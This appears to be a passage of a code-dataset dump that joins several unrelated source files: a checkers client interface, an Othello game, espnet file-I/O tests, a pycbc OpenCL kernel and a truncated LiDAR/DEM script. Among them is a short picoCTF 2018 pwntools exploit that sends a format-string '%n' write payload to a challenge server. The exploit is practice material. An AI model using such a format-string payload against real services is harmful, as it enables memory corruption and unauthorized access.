main()\n","sub_path":"Scripts/Maintenance/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"562578384","text":"from pwn import *\nfrom time import sleep\ndef main():\n r = remote('2018shell1.picoctf.com', 27114)\n offset = 11\n alamat_auth = p32(0x0804a04c)\n p = alamat_auth + \"%\" + str(offset) + \"$n\"\n r.sendline(p)\n r.interactive()\n\nif __name__ == '__main__':\n main()\n","sub_path":"picoCTF2018/pwned/authenticate/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"391865617","text":"\"\"\"\nCS 544\nJune 6, 2018\nThis file contains the Interface class. It provides the basic hooks that the Client needs\ninto the interface to get all the needed user input. Very basic interface.\n\"\"\"\n\nfrom getpass import getpass\nfrom typing import Tuple\n\nfrom internal_types.types import Direction, Move, Board\n\n\nclass Interface:\n \"\"\"\n Basic user interface\n UI\n \"\"\"\n\n def display_message(self, message: str):\n \"\"\"\n Print a message to the screen\n :param message:\n \"\"\"\n print(message)\n\n def display(self, board: Board):\n \"\"\"\n Display a Board on the screen\n :param board: The Board to display\n \"\"\"\n print(\"___________________\")\n print(\"| |1|2|3|4|5|6|7|8|\")\n for i in reversed(range(8)):\n print(\"-------------------\")\n output_str = \"|{}|\".format(8 - i)\n for j in reversed(range(8)):\n pos = board[j, i]\n if not pos.used:\n letter = ' '\n elif pos.owner and pos.promoted:\n letter = 'O'\n elif pos.owner and not pos.promoted:\n letter = 'o'\n elif not pos.owner and pos.promoted:\n letter = 'X'\n elif not pos.owner and not pos.promoted:\n letter = 'x'\n else:\n raise Exception(\"Invalid Board\")\n output_str += \"{}|\".format(letter)\n print(output_str)\n print(\"-------------------\")\n\n def get_move(self) -> Move:\n def get_location():\n try:\n x = int(input(\"X value for piece to move:\"))\n y = int(input(\"Y value for piece to move:\"))\n return x - 1, y - 1\n except ValueError:\n self.display_message(\"Please enter values from 1-8\")\n return get_location()\n\n def get_direction():\n def get_x_dir():\n first_input = input(\"Would you like to move the piece left or right? (left/right): \")\n if first_input == \"left\":\n return Direction.Negative\n elif first_input == \"right\":\n return Direction.Positive\n else:\n return get_x_dir()\n\n def get_y_dir():\n first_input = input(\"Would you like to move the piece up or down? 
(up/down): \")\n if first_input == \"up\":\n return Direction.Negative\n elif first_input == \"down\":\n return Direction.Positive\n else:\n return get_y_dir()\n\n return get_x_dir(), get_y_dir()\n\n return Move(*get_location(), *get_direction())\n\n def game_over(self, final_board: Board, old_rating: int, new_rating: int, you_won: bool):\n \"\"\"\n Display a game end\n :param final_board: Board at the end of the game\n :param old_rating: Rating before the game\n :param new_rating: Rating after the game\n :param you_won: If the user won ro not\n \"\"\"\n self.display(final_board)\n if you_won:\n self.display_message(\"You won!\")\n else:\n self.display_message(\"You lost :(\")\n self.display_message(\"Your Rating changed from {} -> {}\".format(old_rating, new_rating))\n\n def prompt_play_again(self) -> bool:\n \"\"\"\n Ask the player if they want to play again\n :return: Whether or not the User wants to play again\n \"\"\"\n input_str = input(\"Play again? yes/no: \")\n if input_str == \"yes\":\n return True\n elif input_str == \"no\":\n return False\n else:\n return self.prompt_play_again()\n\n def request_credentials(self) -> Tuple[bytes, bytes]:\n \"\"\"\n Prompt the user for username and password\n :return: Username and password\n \"\"\"\n return self.request_username(), self.request_pass()\n\n def request_username(self) -> bytes:\n \"\"\"\n Prompt the user for a username\n :return: Username\n \"\"\"\n return str.encode(input(\"Please input your Username: \"))\n\n def request_pass(self) -> bytes:\n \"\"\"\n Prompt the user for their password\n :return: Password\n \"\"\"\n return str.encode(getpass(\"Please input your Password: \"))\n\n def show_queue_position(self, position: int, rating: int, queue_size: int):\n \"\"\"\n Update in the UI where the user is in queue currently\n :param position: Position in Queue\n :param rating: The User's current rating\n :param queue_size: The length of the queue\n \"\"\"\n self.display_message(\"Position in Queue: {}, Rating: {}, Queue size: {}\".format(position, rating, queue_size))\n\n def game_start(self, opponent_name: str, opponent_rating: int):\n \"\"\"\n Message for when a game starts\n :param opponent_name: The name of the opponent\n :param opponent_rating: The rating of the opponent\n \"\"\"\n self.display_message(\"Starting game vs {} ({})\".format(opponent_name, opponent_rating))\n\n def opponent_left(self):\n \"\"\"\n Display when an opponent leaves\n \"\"\"\n self.display_message(\"Your Opponent Disconnected\")\n","sub_path":"client/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"417326943","text":"# Author: Philip Baranov\n\nimport turtle\nimport random\n\n# GLOBAL constants:\nGAP = 90\t\t\t\t # Distance between the centers of two adjacent cells.\nTOPLEFTX = -320\t\t # X-coordinate of the top-left cell.\nTOPLEFTY = 360\t\t\t # Y-oordinate of the top-left cell.\ncellSize = 4\t\t\t # Size of a single square.\ntokenSize = cellSize * 0.8 # Size of a single token.\n\n# Stamps square cells, 2 at a time, alternating between two colors.\n# First it stamps a black square, and then a slightly smaller green/lightgreen square inside of it.\n# It creates a nice thin black outline that makes the grid look a little nicer.\ndef stampCell(turtle, firstColor, 
secondColor):\n\tturtle.shape('square')\n\tturtle.shapesize(cellSize)\n\tturtle.color('black')\n\tturtle.stamp()\n\n\tturtle.color(firstColor)\n\tturtle.shapesize(cellSize * 0.95)\n\tturtle.stamp()\n\tturtle.fd(GAP)\n\n\tturtle.shapesize(cellSize)\n\tturtle.color('black')\n\tturtle.stamp()\n\n\tturtle.color(secondColor)\n\tturtle.shapesize(cellSize * 0.95)\n\tturtle.stamp()\n\tturtle.fd(GAP)\n\ndef drawGrid():\n\tcount = 0\n\tturtle.goto(TOPLEFTX, TOPLEFTY + 50)\n\n\tfor col in range(8):\n\t\tturtle.write(col, font = ('Arial', 12, 'bold'))\n\t\tturtle.setx(turtle.xcor() + GAP)\n\n\tturtle.goto(TOPLEFTX, TOPLEFTY)\n\n\tfor row in range(4):\n\t\tturtle.color('black')\n\t\tturtle.goto(turtle.xcor() - 70, turtle.ycor() - 7.5)\n\t\tturtle.write(count, font = ('Arial', 12, 'bold'))\n\t\tturtle.goto(turtle.xcor() + 70, turtle.ycor() + 7.5)\n\t\tcount += 1\n\n\t\tfor rowDarkLight in range(4):\n\t\t\tfirstColor = 'green'\n\t\t\tsecondColor = 'lightgreen'\n\t\t\tstampCell(turtle, firstColor, secondColor)\n\n\t\tturtle.goto(turtle.xcor() - 8 * GAP, turtle.ycor() - GAP)\n\t\tturtle.color('black')\n\t\tturtle.goto(turtle.xcor() - 70, turtle.ycor() - 7.5)\n\t\tturtle.write(count, font = ('Arial', 12, 'bold'))\n\t\tturtle.goto(turtle.xcor() + 70, turtle.ycor() + 7.5)\n\n\t\tfor rowLightDark in range(4):\n\t\t\tfirstColor = 'lightgreen'\n\t\t\tsecondColor = 'green'\n\t\t\tstampCell(turtle, firstColor, secondColor)\n\n\t\tturtle.goto(turtle.xcor() - 8 * GAP, turtle.ycor() - GAP)\n\t\tcount += 1\n\ndef stampToken(color):\n\tturtle.shape('circle')\n\tturtle.shapesize(tokenSize)\n\tturtle.color('black')\n\tturtle.stamp()\n\tturtle.shapesize(tokenSize * 0.925)\n\tturtle.color(color)\n\tturtle.stamp()\n\n# Places 4 initial tokens on the grid.\ndef placeTokens(board):\n\tcolor = 'white'\n\tturtle.goto(3 * GAP + TOPLEFTX, TOPLEFTY - 3 * GAP)\n\tstampToken(color)\n\trow = int((TOPLEFTY - turtle.ycor()) // GAP)\n\tcol = int((turtle.xcor() - TOPLEFTX) // GAP)\n\tboard[row][col] = color\n\n\tcolor = 'black'\n\tturtle.goto(4 * GAP + TOPLEFTX, TOPLEFTY - 3 * GAP)\n\tstampToken(color)\n\trow = int((TOPLEFTY - turtle.ycor()) // GAP)\n\tcol = int((turtle.xcor() - TOPLEFTX) // GAP)\n\tboard[row][col] = color\n\n\tcolor = 'black'\n\tturtle.goto(3 * GAP + TOPLEFTX, TOPLEFTY - 4 * GAP)\n\tstampToken(color)\n\trow = int((TOPLEFTY - turtle.ycor()) // GAP)\n\tcol = int((turtle.xcor() - TOPLEFTX) // GAP)\n\tboard[row][col] = color\n\n\tcolor = 'white'\n\tturtle.goto(4 * GAP + TOPLEFTX, TOPLEFTY - 4 * GAP)\n\tstampToken(color)\n\trow = int((TOPLEFTY - turtle.ycor()) // GAP)\n\tcol = int((turtle.xcor() - TOPLEFTX) // GAP)\n\tboard[row][col] = color\n\n# Checks if the cell (row, column) combination is occupied.\ndef isVacant(board, row, col):\n\tif board[row][col] == 0:\n\t\treturn True\n\n# Checks if there are neighbors of the opposite color\ndef checkNeighbors(board, row, col, color):\n\tneighborslist = []\n\n\tif color == 'white':\n\t\topcolor = 'black'\n\telif color == 'black':\n\t\topcolor = 'white'\n\n\tif row == 0:\n\t\tfor testrow in range(row, row + 2):\n\t\t\tif col == 0:\n\t\t\t\tfor testcol in range(col, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telif col == 7:\n\t\t\t\tfor testcol in range(col - 1, col + 1):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telse:\n\t\t\t\tfor testcol in range(col - 1, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == 
opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\telif row == 7:\n\t\tfor testrow in range(row - 1, row + 1):\n\t\t\tif col == 0:\n\t\t\t\tfor testcol in range(col, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telif col == 7:\n\t\t\t\tfor testcol in range(col - 1, col + 1):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telse:\n\t\t\t\tfor testcol in range(col - 1, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\telse:\n\t\tfor testrow in range(row - 1, row + 2):\n\t\t\tif col == 0:\n\t\t\t\tfor testcol in range(col, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telif col == 7:\n\t\t\t\tfor testcol in range(col - 1, col + 1):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\t\t\telse:\n\t\t\t\tfor testcol in range(col - 1, col + 2):\n\t\t\t\t\tif board[testrow][testcol] == opcolor:\n\t\t\t\t\t\tneighborslist.append((testrow, testcol))\n\n\tfor i in neighborslist:\n\t\tif i[0] == row and i[1] == col:\n\t\t\tneighborslist.remove(i)\n\n\treturn neighborslist\n\n# Check if at least one of the straight lines starting from row, col and\n# continuing horizontally, vertically or diagonally in any direction,\n# starts with an opponent's token and ends with a token matching\n# the 'color' argument.\n# It starts at the neighboring cell of the opposite color, and checks if there are\n# more cells of the same color as this one. If yes, it moves onto the next cell.\n# If the next cell is the player's color, the function adds the direction to the list of valid directions.\n# If it is unoccupied or the grid ends, it does nothing.\ndef checkStraightLine(board, row, col, testrow, testcol, color):\n\tvalidlist = []\n\txdir = testcol - col\t# The horizontal direction of an opposite-colored neighboring cell. If it's behind, xdir = -1. If it's in front, xdir = 1.\n\tydir = testrow - row\t# The vertical direction of an opposite-colored neighboring cell. If it's above, ydir = -1. 
If it's below, ydir = 1.\n\trow = testrow\n\tcol = testcol\n\n\twhile board[row][col] != color and board[row][col] != 0 and row + ydir in range(0, 8) and col + xdir in range(0, 8):\n\t\tcol += xdir\n\t\trow += ydir\n\n\t\tif board[row][col] == color:\n\t\t\tvalidlist.append((ydir, xdir))\n\n\treturn validlist\n\n# Combines previous three functions.\n# If the first function is \"True\" and the second and the third one aren't empty lists,\n# the move is \"valid\".\ndef isValidMove(board, row, col, color):\n\tif isVacant(board, row, col) == True:\n\t\tif len(checkNeighbors(board, row, col, color)) > 0:\n\t\t\tfor i in checkNeighbors(board, row, col, color):\n\t\t\t\ttestrow = i[0]\n\t\t\t\ttestcol = i[1]\n\t\t\t\tif len(checkStraightLine(board, row, col, testrow, testcol, color)) > 0:\n\t\t\t\t\treturn True\n\t\treturn False\n\treturn False\n\ndef getValidMoves(board, color):\n\tvalidlist = []\n\n\tfor row in range(8):\n\t\tfor col in range(8):\n\t\t\tif isValidMove(board, row, col, color) == True:\n\t\t\t\tvalidlist.append(tuple([row, col]))\n\n\treturn validlist\n\n# This function flips the opponent's tokens.\n# Similarly to the \"checkStraightLine\" function, it goes through pretty much the same steps,\n# stamping a token of the opposite color and updating the board matrix with each step.\n# After it reaches a cell with a token of the controlling player's color, it stops.\ndef flipTokens(board, row, col, xdir, ydir, color):\n\trow = row + ydir\n\tcol = col + xdir\n\n\twhile board[row][col] != color and board[row][col] != 0 and row + ydir in range(0, 8) and col + xdir in range(0, 8):\n\t\tturtle.goto((col) * GAP + TOPLEFTX, TOPLEFTY - (row) * GAP)\n\t\tturtle.color(color)\n\t\tstampToken(color)\n\t\tboard[row][col] = color\n\t\trow += ydir\n\t\tcol += xdir\n\t\tif board[row][col] == color:\n\t\t\treturn\n\n# Turn of the human player.\n# Checks if there are any moves available. If not, the game ends.\n# If the player enters invalid row and column numbers, or just some random gibberish, the function will keep\n# asking for a valid input.\n# If the player presses \"Cancel\" or inputs a null string, the game stops.\ndef humanTurn(board):\n\tcolor = 'black'\n\n\tif len(getValidMoves(board, color))<1:\n\t\treturn False\n\n\tintcoords = turtle.textinput('', 'Enter \"row, column\". 
With a comma in between:')\n\n\tif intcoords == '' or intcoords == None:\n\t\treturn False\n\tif len(intcoords)<3 or intcoords[0].isdigit() == False or intcoords[2].isdigit() == False:\n\t\thumanTurn(board)\n\n\trow = int(intcoords[0])\n\tcol = int(intcoords[2])\n\tturtle.color(color)\n\n\tif isValidMove(board, row, col, color) == True:\n\t\tturtle.goto(int(col) * GAP + TOPLEFTX, TOPLEFTY - int(row) * GAP)\n\t\tstampToken(color)\n\t\tboard[row][col] = color\n\n\t\tfor i in checkNeighbors(board, row, col, color):\n\t\t\ttestrow = i[0]\n\t\t\ttestcol = i[1]\n\t\t\tfor i in checkStraightLine(board, row, col, testrow, testcol, color):\n\t\t\t\txdir = i[1]\n\t\t\t\tydir = i[0]\n\t\t\t\tflipTokens(board, row, col, xdir, ydir, color)\n\telse:\n\t\thumanTurn(board)\n\n# Computer turn.\n# Generates a random cell out of a list of valid cells, and moves there.\n# If there are no more valid moves, the game ends.\ndef selectNextPlay(board):\n\tcolor = 'white'\n\n\tif len(getValidMoves(board, color))<1:\n\t\treturn False\n\n\tindex = random.randint(0, len(getValidMoves(board, color)) - 1)\n\tcell = getValidMoves(board, color)[index]\n\trow = cell[0]\n\tcol = cell[1]\n\tturtle.color(color)\n\tturtle.goto(int(col) * GAP + TOPLEFTX, TOPLEFTY - int(row) * GAP)\n\tstampToken(color)\n\tboard[row][col] = color\n\n\tfor i in checkNeighbors(board, row, col, color):\n\t\ttestrow = i[0]\n\t\ttestcol = i[1]\n\t\tfor i in checkStraightLine(board, row, col, testrow, testcol, color):\n\t\t\txdir = i[1]\n\t\t\tydir = i[0]\n\t\t\tflipTokens(board, row, col, xdir, ydir, color)\n\n# Creates a scoreboard. Keeps track of the player's and the computer's scores.\n# After the game ends, either declares a victor or a draw.\ndef score(board):\n\tplayerScore = 0\n\tcomputerScore = 0\n\tscoreList = [0, 0]\n\n\tfor row in range(8):\n\t\tfor col in range(8):\n\t\t\tif board[row][col] == 'black':\n\t\t\t\tplayerScore += 1\n\t\t\t\tscoreList[0] = playerScore\n\t\t\telif board[row][col] == 'white':\n\t\t\t\tcomputerScore += 1\n\t\t\t\tscoreList[1] = computerScore\n\n\tif scoreList[0] > scoreList[1]:\n\t\tscoreList.append(\"You win!\")\n\telif scoreList[0]<scoreList[1]:\n\t\tscoreList.append(\"Computer wins!\")\n\telse:\n\t\tscoreList.append(\"Draw!\")\n\n\treturn scoreList\n\n# Human turn + computer turn + update the scoreboard.\n# The game runs until either player no longer has any moves left.\ndef turn(board):\n\tif humanTurn(board)!= False and selectNextPlay(board)!= False:\n\t\tturn(board)\n\n\tturtle.color('black')\n\t\n\tturtle.goto(TOPLEFTX + 0.5 * GAP, TOPLEFTY - 8 * GAP)\n\tturtle.write('Player: ' + str(score(board)[0]), align = 'center', font = (\"Arial\", 30, \"bold\"))\n\n\tturtle.goto(TOPLEFTX + 6 * GAP, TOPLEFTY - 8 * GAP)\n\tturtle.write(\"Computer: \" + str(score(board)[1]), align = 'center', font = (\"Arial\", 30, \"bold\"))\n\n\tturtle.goto(TOPLEFTX + 3.5 * GAP, TOPLEFTY - 8.5 * GAP)\n\tturtle.write(score(board)[2], align = 'center', font = (\"Arial\", 30, \"bold\"))\n\n# The board matrix starts with all cells being vacant (0). 
It updates every time\n# a token is stamped.\ndef main():\n\tBOARD = [\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0]\n\t\t]\n\n\tturtle.setup(850, 900)\n\tturtle.hideturtle()\n\tturtle.speed(0)\n\tturtle.penup()\n\n\tdrawGrid()\n\tplaceTokens(BOARD)\n\tturn(BOARD)\n\n\tturtle.done()\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"Python/othello.py","file_name":"othello.py","file_ext":"py","file_size_in_byte":11400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"590418561","text":"from pathlib import Path\n\nimport numpy as np\nimport pytest\nimport soundfile\n\nfrom espnet2.utils.fileio import DatadirWriter\nfrom espnet2.utils.fileio import load_num_sequence_text\nfrom espnet2.utils.fileio import NpyScpReader\nfrom espnet2.utils.fileio import NpyScpWriter\nfrom espnet2.utils.fileio import read_2column_text\nfrom espnet2.utils.fileio import SoundScpReader\nfrom espnet2.utils.fileio import SoundScpWriter\n\n\ndef test_read_2column_text(tmp_path: Path):\n p = tmp_path / \"dummy.scp\"\n with p.open(\"w\") as f:\n f.write(f\"abc /some/path/a.wav\\n\")\n f.write(f\"def /some/path/b.wav\\n\")\n d = read_2column_text(p)\n assert d == {\"abc\": \"/some/path/a.wav\", \"def\": \"/some/path/b.wav\"}\n\n\n@pytest.mark.parametrize(\n \"loader_type\", [\"text_int\", \"text_float\", \"csv_int\", \"csv_float\", \"dummy\"]\n)\ndef test_load_num_sequence_text(loader_type: str, tmp_path: Path):\n p = tmp_path / \"dummy.txt\"\n if \"csv\" in loader_type:\n delimiter = \",\"\n else:\n delimiter = \" \"\n\n with p.open(\"w\") as f:\n f.write(\"abc \" + delimiter.join([\"0\", \"1\", \"2\"]) + \"\\n\")\n f.write(\"def \" + delimiter.join([\"3\", \"4\", \"5\"]) + \"\\n\")\n desired = {\"abc\": np.array([0, 1, 2]), \"def\": np.array([3, 4, 5])}\n if loader_type == \"dummy\":\n with pytest.raises(ValueError):\n load_num_sequence_text(p, loader_type=loader_type)\n return\n else:\n target = load_num_sequence_text(p, loader_type=loader_type)\n for k in desired:\n np.testing.assert_array_equal(target[k], desired[k])\n\n\ndef test_load_num_sequence_text_invalid(tmp_path: Path):\n p = tmp_path / \"dummy.txt\"\n with p.open(\"w\") as f:\n f.write(\"abc 12.3.3.,4.44\\n\")\n with pytest.raises(ValueError):\n load_num_sequence_text(p)\n\n with p.open(\"w\") as f:\n f.write(\"abc\\n\")\n with pytest.raises(RuntimeError):\n load_num_sequence_text(p)\n\n with p.open(\"w\") as f:\n f.write(\"abc 1 2\\n\")\n f.write(\"abc 2 4\\n\")\n with pytest.raises(RuntimeError):\n load_num_sequence_text(p)\n\n\ndef test_DatadirWriter(tmp_path: Path):\n writer = DatadirWriter(tmp_path)\n # enter(), __exit__(), close()\n with writer as f:\n # __getitem__()\n sub = f[\"aa\"]\n # __setitem__()\n sub[\"bb\"] = \"aa\"\n\n with pytest.raises(TypeError):\n sub[\"bb\"] = 1\n with pytest.raises(RuntimeError):\n # Already has children\n f[\"aa\"] = \"dd\"\n with pytest.raises(RuntimeError):\n # Is a text\n sub[\"cc\"]\n\n # Create a directory, but set mismatched ids\n f[\"aa2\"][\"ccccc\"] = \"aaa\"\n # Duplicated warning\n f[\"aa2\"][\"ccccc\"] = \"def\"\n\n\ndef test_SoundScpReader(tmp_path: Path):\n audio_path1 = tmp_path / \"a1.wav\"\n audio1 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio_path2 = tmp_path / \"a2.wav\"\n audio2 = np.random.randint(-100, 100, 16, 
dtype=np.int16)\n\n soundfile.write(audio_path1, audio1, 16)\n soundfile.write(audio_path2, audio2, 16)\n\n p = tmp_path / \"dummy.scp\"\n with p.open(\"w\") as f:\n f.write(f\"abc {audio_path1}\\n\")\n f.write(f\"def {audio_path2}\\n\")\n\n desired = {\"abc\": (16, audio1), \"def\": (16, audio2)}\n target = SoundScpReader(p, normalize=False, dtype=np.int16)\n\n for k in desired:\n rate1, t = target[k]\n rate2, d = desired[k]\n assert rate1 == rate2\n np.testing.assert_array_equal(t, d)\n\n assert len(target) == len(desired)\n assert \"abc\" in target\n assert \"def\" in target\n assert tuple(target.keys()) == tuple(desired)\n assert tuple(target) == tuple(desired)\n assert target.get_path(\"abc\") == str(audio_path1)\n assert target.get_path(\"def\") == str(audio_path2)\n\n\ndef test_SoundScpReader_normalize(tmp_path: Path):\n audio_path1 = tmp_path / \"a1.wav\"\n audio1 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio_path2 = tmp_path / \"a2.wav\"\n audio2 = np.random.randint(-100, 100, 16, dtype=np.int16)\n\n audio1 = audio1.astype(np.float64) / (np.iinfo(np.int16).max + 1)\n audio2 = audio2.astype(np.float64) / (np.iinfo(np.int16).max + 1)\n\n soundfile.write(audio_path1, audio1, 16)\n soundfile.write(audio_path2, audio2, 16)\n\n p = tmp_path / \"dummy.scp\"\n with p.open(\"w\") as f:\n f.write(f\"abc {audio_path1}\\n\")\n f.write(f\"def {audio_path2}\\n\")\n\n desired = {\"abc\": (16, audio1), \"def\": (16, audio2)}\n target = SoundScpReader(p, normalize=True)\n\n for k in desired:\n rate1, t = target[k]\n rate2, d = desired[k]\n assert rate1 == rate2\n np.testing.assert_array_equal(t, d)\n\n\ndef test_SoundScpWriter(tmp_path: Path):\n audio1 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio2 = np.random.randint(-100, 100, 16, dtype=np.int16)\n with SoundScpWriter(tmp_path, tmp_path / \"wav.scp\", dtype=np.int16) as writer:\n writer[\"abc\"] = 16, audio1\n writer[\"def\"] = 16, audio2\n # Unsupported dimension\n with pytest.raises(RuntimeError):\n y = np.random.randint(-100, 100, [16, 1, 1], dtype=np.int16)\n writer[\"ghi\"] = 16, y\n target = SoundScpReader(tmp_path / \"wav.scp\", normalize=False, dtype=np.int16)\n desired = {\"abc\": (16, audio1), \"def\": (16, audio2)}\n\n for k in desired:\n rate1, t = target[k]\n rate2, d = desired[k]\n assert rate1 == rate2\n np.testing.assert_array_equal(t, d)\n\n assert writer.get_path(\"abc\") == str(tmp_path / \"abc.wav\")\n assert writer.get_path(\"def\") == str(tmp_path / \"def.wav\")\n\n\ndef test_SoundScpWriter_normalize(tmp_path: Path):\n audio1 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio2 = np.random.randint(-100, 100, 16, dtype=np.int16)\n audio1 = audio1.astype(np.float64) / (np.iinfo(np.int16).max + 1)\n audio2 = audio2.astype(np.float64) / (np.iinfo(np.int16).max + 1)\n\n with SoundScpWriter(tmp_path, tmp_path / \"wav.scp\", dtype=np.int16) as writer:\n writer[\"abc\"] = 16, audio1\n writer[\"def\"] = 16, audio2\n # Unsupported dimension\n with pytest.raises(RuntimeError):\n y = np.random.randint(-100, 100, [16, 1, 1], dtype=np.int16)\n writer[\"ghi\"] = 16, y\n target = SoundScpReader(tmp_path / \"wav.scp\", normalize=True, dtype=np.float64)\n desired = {\"abc\": (16, audio1), \"def\": (16, audio2)}\n\n for k in desired:\n rate1, t = target[k]\n rate2, d = desired[k]\n assert rate1 == rate2\n np.testing.assert_array_equal(t, d)\n\n\ndef test_NpyScpReader(tmp_path: Path):\n npy_path1 = tmp_path / \"a1.npy\"\n array1 = np.random.randn(1)\n npy_path2 = tmp_path / \"a2.npy\"\n array2 = 
np.random.randn(1, 1, 10)\n np.save(npy_path1, array1)\n np.save(npy_path2, array2)\n\n p = tmp_path / \"dummy.scp\"\n with p.open(\"w\") as f:\n f.write(f\"abc {npy_path1}\\n\")\n f.write(f\"def {npy_path2}\\n\")\n\n desired = {\"abc\": array1, \"def\": array2}\n target = NpyScpReader(p)\n\n for k in desired:\n t = target[k]\n d = desired[k]\n np.testing.assert_array_equal(t, d)\n\n assert len(target) == len(desired)\n assert \"abc\" in target\n assert \"def\" in target\n assert tuple(target.keys()) == tuple(desired)\n assert tuple(target) == tuple(desired)\n assert target.get_path(\"abc\") == str(npy_path1)\n assert target.get_path(\"def\") == str(npy_path2)\n\n\ndef test_NpyScpWriter(tmp_path: Path):\n array1 = np.random.randn(1)\n array2 = np.random.randn(1, 1, 10)\n with NpyScpWriter(tmp_path, tmp_path / \"feats.scp\") as writer:\n writer[\"abc\"] = array1\n writer[\"def\"] = array2\n target = NpyScpReader(tmp_path / \"feats.scp\")\n desired = {\"abc\": array1, \"def\": array2}\n\n for k in desired:\n t = target[k]\n d = desired[k]\n np.testing.assert_array_equal(t, d)\n\n assert writer.get_path(\"abc\") == str(tmp_path / \"abc.npy\")\n assert writer.get_path(\"def\") == str(tmp_path / \"def.npy\")\n","sub_path":"test/espnet2/utils/test_fileio.py","file_name":"test_fileio.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"646172271","text":"# Copyright (C) 2012 Alex Nitz\n# This program is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 3 of the License, or (at your\n# option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General\n# Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n\n#\n# =============================================================================\n#\n# Preamble\n#\n# =============================================================================\n#\n\nfrom pyopencl.elementwise import ElementwiseKernel\nfrom pytools import match_precision\nfrom pyopencl.tools import context_dependent_memoize, dtype_to_ctype\nfrom pyopencl.array import _get_common_dtype\nfrom pycbc.scheme import mgr\nimport numpy\n\n@context_dependent_memoize\ndef get_correlate_kernel(dtype_x, dtype_y,dtype_out):\n if dtype_x == numpy.complex64:\n op = \"z[i] = cfloat_mul(cfloat_conj(x[i]), y[i])\"\n elif dtype_x == numpy.complex128:\n op = \"z[i] = cdouble_mul(cdouble_conj(x[i]), y[i])\"\n return ElementwiseKernel(mgr.state.context,\n \"%(tp_x)s *x, %(tp_y)s *y, %(tp_z)s *z\" % {\n \"tp_x\": dtype_to_ctype(dtype_x),\n \"tp_y\": dtype_to_ctype(dtype_y),\n \"tp_z\": dtype_to_ctype(dtype_out),\n },\n op,\n \"correlate\")\n\ndef correlate(a, b, out, stream=None):\n dtype_out = _get_common_dtype(a, b, mgr.state.queue)\n krnl = get_correlate_kernel(a.dtype, b.dtype, dtype_out)\n krnl(a.data, b.data, out.data)\n\n\n\n\n","sub_path":"pycbc/filter/matchedfilter_opencl.py","file_name":"matchedfilter_opencl.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25433374","text":"import laspy as ls\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom osgeo import gdal, ogr, osr\nfrom mpl_toolkits.mplot3d import Axes3D\nimport csv\nimport os\nimport rasterio\n\ntest_flag=True\n\n#%% functions\nelevationMissNoS0f = 1900.\n\ndef readPlotDEM(filename,elevationMissNo):#,pathName\n demset = gdal.Open(filename)\n band = demset.GetRasterBand(1)\n elevation = band.ReadAsArray()\n elevation[elevation == -9999.] = elevationMissNo\n elevation[elevation > 100000] = elevationMissNo\n \n# x0, dx, dxdy, y0, dydx, dy = demset.GetGeoTransform()\n# nrows, ncols = elevation.shape\n# x1 = x0 + dx * ncols\n# y1 = y0 + dy * nrows\n# extent=[x0, x1, y1, y0]\n \n# plt.figure(figsize=(30,20))\n# plt.imshow(elevation, cmap='gist_earth', extent=extent)\n# plt.savefig(pathName)\n \n return elevation\n\ndef readDEMt0findBoundray(filename,elevationMissNo,pathName):\n demset = gdal.Open(filename)\n band = demset.GetRasterBand(1)\n elevation = band.ReadAsArray()\n elevation[elevation == -9999.] = elevationMissNo\n elevation[elevation > 100000] = elevationMissNo\n \n x0, dx, dxdy, y0, dydx, dy = demset.GetGeoTransform()\n nrows, ncols = elevation.shape\n x1 = x0 + dx * ncols\n y1 = y0 + dy * nrows\n extent=[x0, x1, y1, 